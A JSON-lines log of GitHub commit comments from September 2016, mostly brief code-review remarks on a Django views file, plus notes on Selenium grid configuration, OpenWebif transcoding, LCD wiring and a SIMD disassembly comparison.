{"id":"4623519769","type":"CommitCommentEvent","actor":{"login":"davehunt"},"repo":{"name":"mozilla/moz-grid-config"},"payload":{"comment":{"id":19188720,"position":null,"line":null,"path":null,"commit_id":"9b527586a5e97fc7f2043d4eac8a8da0f7d91867","created_at":"2016-09-27T11:17:04Z","updated_at":"2016-09-27T11:17:04Z","body":"@bebef1987 you haven't provided details of what failed, but I just tried this myself. The download seems fine but the classname is wrong for Selenium 2.x. I've made this configurable in https://github.com/mozilla/moz-grid-config/commit/e1c8343118e69f8c0d2d6af24d618de9cfcb7900 so you can use a properties file such as:\r\n\r\n```ini\r\nselenium.version.major = 2.53\r\nselenium.version.minor = 1\r\nselenium.version.suffix =\r\nselenium.classname = org.openqa.grid.selenium.GridLauncher\r\n```"}},"created_at":"2016-09-27T11:17:04Z"}
{"id":"4623520780","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188722,"position":199,"line":123,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:17:16Z","updated_at":"2016-09-27T11:17:16Z","body":"Why do we use Context class with render ?"}},"created_at":"2016-09-27T11:17:16Z"}
{"id":"4623521640","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188724,"position":185,"line":104,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:17:28Z","updated_at":"2016-09-27T11:17:28Z","body":"Use FormView"}},"created_at":"2016-09-27T11:17:28Z"}
{"id":"4623522644","type":"CommitCommentEvent","actor":{"login":"rs351"},"repo":{"name":"ModelingOriginsofLife/ProtocellModels"},"payload":{"comment":{"id":19188726,"position":null,"line":null,"path":null,"commit_id":"cb0f2d7e2cc079bd9745848959b8693d017d650b","created_at":"2016-09-27T11:17:41Z","updated_at":"2016-09-27T11:17:41Z","body":"This is an extended version of the lattice artificial chemistry protocell model of Ono and Ikegami first presented at ALife about 14 years ago. Compared to the original version there is an extra catalyst species which catalyses the decay of membrane particles. I wrote this code a long time ago so I'm afraid it's rather cumbersome and there is an anisotropy problem that I never got around to fixing."}},"created_at":"2016-09-27T11:17:41Z"}
{"id":"4623523042","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188727,"position":164,"line":91,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:17:46Z","updated_at":"2016-09-27T11:17:46Z","body":"Use RedirectView"}},"created_at":"2016-09-27T11:17:46Z"}
{"id":"4623524471","type":"CommitCommentEvent","actor":{"login":"sadovnik"},"repo":{"name":"electricSemyon/vk-intersect"},"payload":{"comment":{"id":19188729,"position":9,"line":9,"path":"tests/intersectionTest.js","commit_id":"2d345f0fcc949a7a7bfbcf5604bf48c14f74b0e2","created_at":"2016-09-27T11:18:06Z","updated_at":"2016-09-27T11:18:06Z","body":"This is not how `describe` and `it` supposed to be used.\r\n\r\nSearch for some reference and nodejs conventions.\r\n\r\nhttps://github.com/expressjs/express/tree/master/test\r\nhttp://betterspecs.org"}},"created_at":"2016-09-27T11:18:06Z"}
{"id":"4623524548","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188730,"position":204,"line":127,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:18:07Z","updated_at":"2016-09-27T11:18:07Z","body":"USe RedirectView"}},"created_at":"2016-09-27T11:18:07Z"}
{"id":"4623526901","type":"CommitCommentEvent","actor":{"login":"sadovnik"},"repo":{"name":"electricSemyon/vk-intersect"},"payload":{"comment":{"id":19188733,"position":12,"line":12,"path":"tests/intersectionTest.js","commit_id":"2d345f0fcc949a7a7bfbcf5604bf48c14f74b0e2","created_at":"2016-09-27T11:18:40Z","updated_at":"2016-09-27T11:18:40Z","body":"http://stackoverflow.com/questions/729692/why-should-text-files-end-with-a-newline"}},"created_at":"2016-09-27T11:18:40Z"}
{"id":"4623527648","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19188736,"position":67,"line":64,"path":"js/script.js","commit_id":"52f7db694aaea040c4fc1a308bd086f3ef02a5fc","created_at":"2016-09-27T11:18:51Z","updated_at":"2016-09-27T11:18:51Z","body":"ten kod leży luzem pomiędzy deklaracjami funkcji - opakuj go w funkcję i wywołaj w miejscu gdzie ma to sens"}},"created_at":"2016-09-27T11:18:51Z"}
{"id":"4623527988","type":"CommitCommentEvent","actor":{"login":"joodicator"},"repo":{"name":"ammaraskar/pyCraft"},"payload":{"comment":{"id":19188738,"position":null,"line":null,"path":null,"commit_id":"c4ed8e6d68566b4dd6e4562b0d88d2fe4ad895b2","created_at":"2016-09-27T11:18:56Z","updated_at":"2016-09-27T11:18:56Z","body":"Correction: this is protocol 306, not 305."}},"created_at":"2016-09-27T11:18:56Z"}
{"id":"4623529475","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188740,"position":167,"line":94,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:19:16Z","updated_at":"2016-09-27T11:19:16Z","body":"from django.utils import timezone\r\n\r\nnow = timezone.now()?"}},"created_at":"2016-09-27T11:19:16Z"}
{"id":"4623532450","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188743,"position":178,"line":100,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:19:58Z","updated_at":"2016-09-27T11:19:58Z","body":"Use reverse_lazy with url name and namespace"}},"created_at":"2016-09-27T11:19:58Z"}
{"id":"4623534254","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188750,"position":207,"line":130,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:20:21Z","updated_at":"2016-09-27T11:20:21Z","body":"reverse_lazy?"}},"created_at":"2016-09-27T11:20:21Z"}
{"id":"4623534360","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-drag-question"},"payload":{"comment":{"id":19188751,"position":9,"line":82,"path":"semantics.json","commit_id":"69d75abd43472fabd15f830765d029387801e0ce","created_at":"2016-09-27T11:20:22Z","updated_at":"2016-09-27T11:20:22Z","body":"To avoid error messages when validating existing content, if not we'll have to add an upgrade script that sets the default value… or maybe we don't need it anymore if 'default' is set?\r\nPreviously, we've just been making new fields optional to avoid the validation error message."}},"created_at":"2016-09-27T11:20:22Z"}
{"id":"4623534535","type":"CommitCommentEvent","actor":{"login":"moy"},"repo":{"name":"hickford/MechanicalSoup"},"payload":{"comment":{"id":19188752,"position":null,"line":null,"path":null,"commit_id":"b12a4847f072e3b641e2d19792a8798c7b5bfb16","created_at":"2016-09-27T11:20:24Z","updated_at":"2016-09-27T11:20:24Z","body":"I was using the development version because of unreleased fixes. Very cool to see a release :-). Thanks!"}},"created_at":"2016-09-27T11:20:24Z"}
{"id":"4623535293","type":"CommitCommentEvent","actor":{"login":"DuckyDuckling"},"repo":{"name":"Wozar/dragon-icetea"},"payload":{"comment":{"id":19188755,"position":61,"line":59,"path":"Shader Source/Light.frag","commit_id":"9bfa3855302396a709501d5967a3f31b0b036ddd","created_at":"2016-09-27T11:20:35Z","updated_at":"2016-09-27T11:20:35Z","body":";;;;;;;;;;;;;;;;;;;;;;;"}},"created_at":"2016-09-27T11:20:35Z"}
{"id":"4623535945","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-drag-question"},"payload":{"comment":{"id":19188758,"position":null,"line":null,"path":null,"commit_id":"69d75abd43472fabd15f830765d029387801e0ce","created_at":"2016-09-27T11:20:43Z","updated_at":"2016-09-27T11:20:43Z","body":"Indeed, we'll add them now that the auto-align options are in place as well!"}},"created_at":"2016-09-27T11:20:43Z"}
{"id":"4623537011","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188760,"position":166,"line":93,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:20:58Z","updated_at":"2016-09-27T11:20:58Z","body":"What about handling DoesNotExist?"}},"created_at":"2016-09-27T11:20:58Z"}
{"id":"4623539314","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188770,"position":120,"line":56,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:21:29Z","updated_at":"2016-09-27T11:21:29Z","body":"USe FormView"}},"created_at":"2016-09-27T11:21:29Z"}
{"id":"4623540685","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188773,"position":122,"line":58,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:21:47Z","updated_at":"2016-09-27T11:21:47Z","body":"Ugly hardcode!!!!!!!!!!!!!!!"}},"created_at":"2016-09-27T11:21:47Z"}
{"id":"4623541426","type":"CommitCommentEvent","actor":{"login":"DuckyDuckling"},"repo":{"name":"pragmascript/core-network"},"payload":{"comment":{"id":19188775,"position":1,"line":1,"path":"LICENSE","commit_id":"cfab6ad22ffd642026b0cc5ca0685afa4e935f2e","created_at":"2016-09-27T11:21:58Z","updated_at":"2016-09-27T11:21:58Z","body":"Bad license"}},"created_at":"2016-09-27T11:21:58Z"}
{"id":"4623542070","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19188778,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T11:22:08Z","updated_at":"2016-09-27T11:22:08Z","body":"Why do you believe the problem is in Twisted?\r\nI can't even reproduce the problem here anymore.\r\n\r\nYes, the error inside the log is still there:\r\n`13:11:56.334 { E } /usr/lib/python2.7/site-packages/twisted/logger/_file.py:66 __call__ Unhandled error in Deferred:\r\n13:11:56.335 { E } /usr/lib/python2.7/site-packages/twisted/logger/_file.py:66 __call__ \r\n\r\nTraceback (most recent call last):\r\nFailure: twisted.internet.error.ConnectionLost: Connection to the other side was lost in a non-clean fashion.' \r\n\r\nBut as a matter of fact, I can zap around as I want.\r\nI believe Twisted just to be the messenger here."}},"created_at":"2016-09-27T11:22:08Z"}
{"id":"4623542757","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188782,"position":131,"line":67,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:22:17Z","updated_at":"2016-09-27T11:22:17Z","body":"uuid?"}},"created_at":"2016-09-27T11:22:17Z"}
{"id":"4623544605","type":"CommitCommentEvent","actor":{"login":"Mattar555"},"repo":{"name":"lkm1321/mtrx3700-major"},"payload":{"comment":{"id":19188789,"position":null,"line":null,"path":null,"commit_id":"45df192747ec2066d046f399ced317bb18a6edc7","created_at":"2016-09-27T11:22:42Z","updated_at":"2016-09-27T11:22:42Z","body":"ASIDE (LCD 4 bit interface)\r\nPIN14 to DB3 (PORTD Pin 3)\r\nPIN13 to DB2 (PORTD Pin 2)\r\nPIN12 to DB1 (PORTD Pin 1)\r\nPIN11 to DB0 (PORTD Pin 0)\r\nSet the contrast voltage to lie within the range [0.2,0.5] Volts"}},"created_at":"2016-09-27T11:22:42Z"}
{"id":"4623547524","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188797,"position":128,"line":64,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:23:23Z","updated_at":"2016-09-27T11:23:23Z","body":"create_user(username, email=None, password=None, **extra_fields) extra_fields??????? Use them instead one more save and call to DB"}},"created_at":"2016-09-27T11:23:23Z"}
{"id":"4623550753","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19188813,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T11:24:09Z","updated_at":"2016-09-27T11:24:09Z","body":"because if i use old twisted transcoding is stopped properly :)\r\n\r\nDo not mix transcoding and streaming.\r\n\r\nstreaming is fine. please check transcoding. transcoding creates a fake recording and pumps it to transtreamproxy.\r\n"}},"created_at":"2016-09-27T11:24:09Z"}
{"id":"4623551413","type":"CommitCommentEvent","actor":{"login":"arnesongit"},"repo":{"name":"mones88/python-tidal"},"payload":{"comment":{"id":19188814,"position":null,"line":null,"path":null,"commit_id":"600577159d8f17ed480cad63769544d40768a48c","created_at":"2016-09-27T11:24:18Z","updated_at":"2016-09-27T11:24:18Z","body":"I found that the unique key number is not relevant, but the parameter clientUniqueKey must be given.\r\nSo I'm using a random number as a key and it is working !!"}},"created_at":"2016-09-27T11:24:18Z"}
{"id":"4623552051","type":"CommitCommentEvent","actor":{"login":"mattvenn"},"repo":{"name":"Bristol-Braille/canute-ui"},"payload":{"comment":{"id":19188815,"position":null,"line":null,"path":null,"commit_id":"ec1adab6755eb220a90c09c5195f109632f3df2c","created_at":"2016-09-27T11:24:26Z","updated_at":"2016-09-27T11:24:26Z","body":"no, I didn't see your email until after I'd already added it in response to\nthe issue you opened.\n\nAnd regarding --rebase, what do you mean litter history with commit merges?\nI had a look at the history and don't understand what you mean.\nAnd in terms of when to do a --rebase, is it just when I do a pull? Can I\nadd it to my .git/config so I don't have to remember?\nMatt\n\nOn 27 September 2016 at 12:05, Kaspar Emanuel <notifications@github.com>\nwrote:\n\n> Why did you add this? Did you check my changes to INSTALL.md?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Bristol-Braille/canute-ui/commit/ec1adab6755eb220a90c09c5195f109632f3df2c#commitcomment-19187904>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAmtbKLpxXajgL7jlYsgqJ0M91dkLlb6ks5quOqGgaJpZM4KHe0j>\n> .\n>\n\n\n\n-- \nMatthew Venn\nweb mattvenn.net twitter @matthewvenn <https://twitter.com/matthewvenn>\n"}},"created_at":"2016-09-27T11:24:26Z"}
{"id":"4623552920","type":"CommitCommentEvent","actor":{"login":"sedubois"},"repo":{"name":"este/este"},"payload":{"comment":{"id":19188816,"position":20,"line":20,"path":"src/common/lib/redux-firebase/firebase.js","commit_id":"55124e22f1148886721ee95689aece95965cdf68","created_at":"2016-09-27T11:24:38Z","updated_at":"2016-09-27T11:24:38Z","body":"@steida might get simpler (and with more features) using GraphQL/Relay. E.g https://github.com/codefoundries/UniversalRelayBoilerplate"}},"created_at":"2016-09-27T11:24:38Z"}
{"id":"4623553174","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188817,"position":128,"line":64,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:24:41Z","updated_at":"2016-09-27T11:24:41Z","body":"email , password - named argument. Why do you use create_user(username, email, password) instead create_user(username, email=email, password=password). That's ugly!!!"}},"created_at":"2016-09-27T11:24:41Z"}
{"id":"4623555277","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188821,"position":137,"line":73,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:25:09Z","updated_at":"2016-09-27T11:25:09Z","body":"Do not use Context object and render"}},"created_at":"2016-09-27T11:25:09Z"}
{"id":"4623560036","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188832,"position":106,"line":42,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:26:17Z","updated_at":"2016-09-27T11:26:17Z","body":"What the fuck???"}},"created_at":"2016-09-27T11:26:17Z"}
{"id":"4623560389","type":"CommitCommentEvent","actor":{"login":"OussamaMerdji"},"repo":{"name":"victormours/file-to-api-kata"},"payload":{"comment":{"id":19188834,"position":null,"line":null,"path":null,"commit_id":"699d5ac2630073557fa8c6bcfbefa986211018ef","created_at":"2016-09-27T11:26:22Z","updated_at":"2016-09-27T11:26:22Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [yo](https://trello.com/c/7QaWQk1p/1-yo)"}},"created_at":"2016-09-27T11:26:22Z"}
{"id":"4623560450","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19188835,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T11:26:23Z","updated_at":"2016-09-27T11:26:23Z","body":"I've tested using transcoding ..."}},"created_at":"2016-09-27T11:26:23Z"}
{"id":"4623561063","type":"CommitCommentEvent","actor":{"login":"mattock"},"repo":{"name":"chipitsine/openvpn-build"},"payload":{"comment":{"id":19188837,"position":null,"line":null,"path":null,"commit_id":"cebc45e46ed18111305954127e08f0be9894cc73","created_at":"2016-09-27T11:26:31Z","updated_at":"2016-09-27T11:26:31Z","body":"@chipitsine : I applied this patch on top of https://github.com/chipitsine/openvpn-build/commit/a1370a8bb5eb5c1803d0e2811205face2d42490d in my own openvpn-build tree and it produced a combined installer, which I did not yet have time to test. In any case, $OPENVPN_VERSION variable gets lots at some point. Before applying your patches I got _openvpn-install-2.3_git-I601-<archi>.exe_ out of build-complete, but afterwards it produced _openvpn-install--I601.exe_. I did not debug this much further, but a bug might be lurking in the whitespace changes. Can you experience the same behavior?"}},"created_at":"2016-09-27T11:26:31Z"}
{"id":"4623561932","type":"CommitCommentEvent","actor":{"login":"floehopper"},"repo":{"name":"freerange/trello_backup"},"payload":{"comment":{"id":19188840,"position":null,"line":null,"path":null,"commit_id":"474c39f76c67f7b8000549750e25f472e6521998","created_at":"2016-09-27T11:26:42Z","updated_at":"2016-09-27T11:26:42Z","body":"It looks as if my statement in the commit note was inaccurate:\r\n\r\n> The clear_crontab task was running after the code was updated, but before the bundle was installed.\r\n\r\nLooking at the code, it must've been running *before* the code was updated. The problem must've been that the Ruby version specified in the old Gemfile (v2.1.9) did not match the current Ruby version (v2.2.5).\r\n\r\nAll that being said, I can't see a better way of fixing this."}},"created_at":"2016-09-27T11:26:42Z"}
{"id":"4623562926","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188843,"position":109,"line":45,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:26:56Z","updated_at":"2016-09-27T11:26:56Z","body":"if request.GET.get('pk', '0') returns \"blabla bla\" you will get exception"}},"created_at":"2016-09-27T11:26:56Z"}
{"id":"4623564606","type":"CommitCommentEvent","actor":{"login":"lifecoderonak2016"},"repo":{"name":"lifecoderonak2016/hello-world"},"payload":{"comment":{"id":19188846,"position":null,"line":null,"path":null,"commit_id":"447e9cb7a7b568f815cac70ccacc6cf9aaadc242","created_at":"2016-09-27T11:27:19Z","updated_at":"2016-09-27T11:27:19Z","body":"hey i have changed the python file"}},"created_at":"2016-09-27T11:27:19Z"}
{"id":"4623564765","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19188847,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T11:27:21Z","updated_at":"2016-09-27T11:27:21Z","body":"and your used tuner is free'd again?\r\nTuner A live tv\r\ntuner B is used for transcoded stream\r\ni stop transcoding\r\ntuner B stays active."}},"created_at":"2016-09-27T11:27:21Z"}
{"id":"4623566765","type":"CommitCommentEvent","actor":{"login":"nekrozar"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19188850,"position":null,"line":null,"path":null,"commit_id":"2582c6ee86b25df16776a9a7c8d5d79a87a01c75","created_at":"2016-09-27T11:27:48Z","updated_at":"2016-09-27T11:27:48Z","body":"If player attached 2 Juunishishi monsters to Shogi Rook by Numbers Overlay Boost, as Xyz Materials, Shogi Rook doesn't gain effect."}},"created_at":"2016-09-27T11:27:48Z"}
{"id":"4623567577","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"Jenik-art/PycharmProjects"},"payload":{"comment":{"id":19188853,"position":16,"line":9,"path":"Test2.py","commit_id":"26abc0676cad818169a3271e63ca08561c550508","created_at":"2016-09-27T11:28:00Z","updated_at":"2016-09-27T11:28:00Z","body":"Please delete this line. It does nothing useful"}},"created_at":"2016-09-27T11:28:00Z"}
{"id":"4623567664","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188854,"position":113,"line":49,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:28:01Z","updated_at":"2016-09-27T11:28:01Z","body":"Do not use except without Exception. You need to catch only DOesNotExist"}},"created_at":"2016-09-27T11:28:01Z"}
{"id":"4623568673","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"Jenik-art/PycharmProjects"},"payload":{"comment":{"id":19188857,"position":23,"line":15,"path":"Test2.py","commit_id":"26abc0676cad818169a3271e63ca08561c550508","created_at":"2016-09-27T11:28:14Z","updated_at":"2016-09-27T11:28:14Z","body":"Please delete this line. It does nothing useful"}},"created_at":"2016-09-27T11:28:14Z"}
{"id":"4623568750","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188858,"position":104,"line":40,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:28:15Z","updated_at":"2016-09-27T11:28:15Z","body":"Use DetailView"}},"created_at":"2016-09-27T11:28:15Z"}
{"id":"4623568920","type":"CommitCommentEvent","actor":{"login":"Kyle873"},"repo":{"name":"Arks-Layer/PSNovaTranslations"},"payload":{"comment":{"id":19188859,"position":null,"line":null,"path":null,"commit_id":"51d25facc0099a335d07cccfca2c7afeed1272f9","created_at":"2016-09-27T11:28:18Z","updated_at":"2016-09-27T11:28:18Z","body":"♥ you too m8"}},"created_at":"2016-09-27T11:28:18Z"}
{"id":"4623569696","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188861,"position":95,"line":31,"path":"app2/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:28:28Z","updated_at":"2016-09-27T11:28:28Z","body":"Use TemplateView"}},"created_at":"2016-09-27T11:28:28Z"}
{"id":"4623570112","type":"CommitCommentEvent","actor":{"login":"alankelly"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":19188864,"position":64,"line":64,"path":"include/boost/simd/arch/x86/avx/simd/function/deinterleave.hpp","commit_id":"b8458ae8a23ebc307b7e3ab5d2ac15d85968d16b","created_at":"2016-09-27T11:28:34Z","updated_at":"2016-09-27T11:28:34Z","body":"Looks like bitwise_cast is passing by the stack. This was compiled using g++ 4.9.3 with -O3 -DNEDBUG\r\nWithout bitwise_cast:\r\n4010c1:       48 8b 95 50 ff ff ff    mov    -0xb0(%rbp),%rdx\r\n4010c8:       c4 e3 7d 18 cb 01       vinsertf128 $0x1,%xmm3,%ymm0,%ymm1\r\n4010ce:       48 89 45 b0             mov    %rax,-0x50(%rbp)\r\n4010d2:       48 8b 85 78 ff ff ff    mov    -0x88(%rbp),%rax\r\n4010d9:       c4 e3 7d 06 c3 31       vperm2f128 $0x31,%ymm3,%ymm0,%ymm0\r\n4010df:       48 89 55 90             mov    %rdx,-0x70(%rbp)\r\n4010e3:       48 8b 95 58 ff ff ff    mov    -0xa8(%rbp),%rdx\r\n4010ea:       48 89 45 b8             mov    %rax,-0x48(%rbp)\r\n4010ee:       48 8b 45 80             mov    -0x80(%rbp),%rax\r\n4010f2:       c5 f4 14 d0             vunpcklps %ymm0,%ymm1,%ymm2\r\n4010f6:       48 89 55 98             mov    %rdx,-0x68(%rbp)\r\n4010fa:       48 8b 95 60 ff ff ff    mov    -0xa0(%rbp),%rdx\r\n401101:       48 89 45 c0             mov    %rax,-0x40(%rbp)\r\n401105:       c5 f4 15 c0             vunpckhps %ymm0,%ymm1,%ymm0\r\n401109:       48 8b 45 88             mov    -0x78(%rbp),%rax\r\n40110d:       48 89 55 a0             mov    %rdx,-0x60(%rbp)\r\n401111:       48 8b 95 68 ff ff ff    mov    -0x98(%rbp),%rdx\r\n401118:       c5 ec 14 c8             vunpcklps %ymm0,%ymm2,%ymm1\r\n40111c:       48 89 45 c8             mov    %rax,-0x38(%rbp)\r\n401120:       c5 ec 15 c0             vunpckhps %ymm0,%ymm2,%ymm0\r\n401124:       48 89 55 a8             mov    %rdx,-0x58(%rbp)\r\n\r\nAnd with bitwise_cast:\r\n4010c1:       c4 e3 7d 18 cb 01       vinsertf128 $0x1,%xmm3,%ymm0,%ymm1\r\n4010c7:       48 89 85 50 ff ff ff    mov    %rax,-0xb0(%rbp)\r\n4010ce:       c4 e3 7d 06 c3 31       vperm2f128 $0x31,%ymm3,%ymm0,%ymm0\r\n4010d4:       48 8b 85 18 ff ff ff    mov    -0xe8(%rbp),%rax\r\n4010db:       48 8b 95 f0 fe ff ff    mov    -0x110(%rbp),%rdx\r\n4010e2:       c5 f4 14 d0             vunpcklps %ymm0,%ymm1,%ymm2\r\n4010e6:       48 89 85 58 ff ff ff    mov    %rax,-0xa8(%rbp)\r\n4010ed:       c5 f4 15 c0             vunpckhps %ymm0,%ymm1,%ymm0\r\n4010f1:       48 8b 85 20 ff ff ff    mov    -0xe0(%rbp),%rax\r\n4010f8:       48 89 95 30 ff ff ff    mov    %rdx,-0xd0(%rbp)\r\n4010ff:       48 8b 95 f8 fe ff ff    mov    -0x108(%rbp),%rdx\r\n401106:       48 89 85 60 ff ff ff    mov    %rax,-0xa0(%rbp)\r\n40110d:       c5 ec 14 f8             vunpcklps %ymm0,%ymm2,%ymm7\r\n401111:       48 8b 85 28 ff ff ff    mov    -0xd8(%rbp),%rax\r\n401118:       c5 ec 15 e0             vunpckhps %ymm0,%ymm2,%ymm4\r\n40111c:       48 89 95 38 ff ff ff    mov    %rdx,-0xc8(%rbp)\r\n401123:       48 8b 95 00 ff ff ff    mov    -0x100(%rbp),%rdx\r\n40112a:       c5 fc 29 bd 90 fe ff    vmovaps %ymm7,-0x170(%rbp)\r\n401131:       ff \r\n401132:       48 89 85 68 ff ff ff    mov    %rax,-0x98(%rbp)\r\n401139:       48 8b 85 90 fe ff ff    mov    -0x170(%rbp),%rax\r\n401140:       c5 fc 29 7d b0          vmovaps %ymm7,-0x50(%rbp)\r\n401145:       c5 fc 29 a5 70 fe ff    vmovaps %ymm4,-0x190(%rbp)\r\n40114c:       ff \r\n40114d:       48 89 95 40 ff ff ff    mov    %rdx,-0xc0(%rbp)\r\n401154:       48 8b 95 08 ff ff ff    mov    -0xf8(%rbp),%rdx\r\n40115b:       48 89 85 70 ff ff ff    mov    %rax,-0x90(%rbp)\r\n401162:       48 8b 45 b8             mov    -0x48(%rbp),%rax\r\n401166:       48 89 95 48 ff ff ff    mov    %rdx,-0xb8(%rbp)\r\n40116d:       48 89 85 78 ff ff ff    mov    %rax,-0x88(%rbp)\r\n401174:       48 8b 45 c0             mov    -0x40(%rbp),%rax\r\n401178:       48 89 45 80             mov    %rax,-0x80(%rbp)\r\n40117c:       48 8b 45 c8             mov    -0x38(%rbp),%rax\r\n401180:       c5 fc 29 65 b0          vmovaps %ymm4,-0x50(%rbp)\r\n401185:       48 89 45 88             mov    %rax,-0x78(%rbp)\r\n401189:       48 8b 85 70 fe ff ff    mov    -0x190(%rbp),%rax\r\n401190:       48 89 45 90             mov    %rax,-0x70(%rbp)\r\n401194:       48 8b 45 b8             mov    -0x48(%rbp),%rax\r\n401198:       48 89 45 98             mov    %rax,-0x68(%rbp)\r\n40119c:       48 8b 45 c0             mov    -0x40(%rbp),%rax\r\n4011a0:       48 89 45 a0             mov    %rax,-0x60(%rbp)\r\n4011a4:       48 8b 45 c8             mov    -0x38(%rbp),%rax\r\n4011a8:       48 89 45 a8             mov    %rax,-0x58(%rbp)\r\n\r\n"}},"created_at":"2016-09-27T11:28:34Z"}
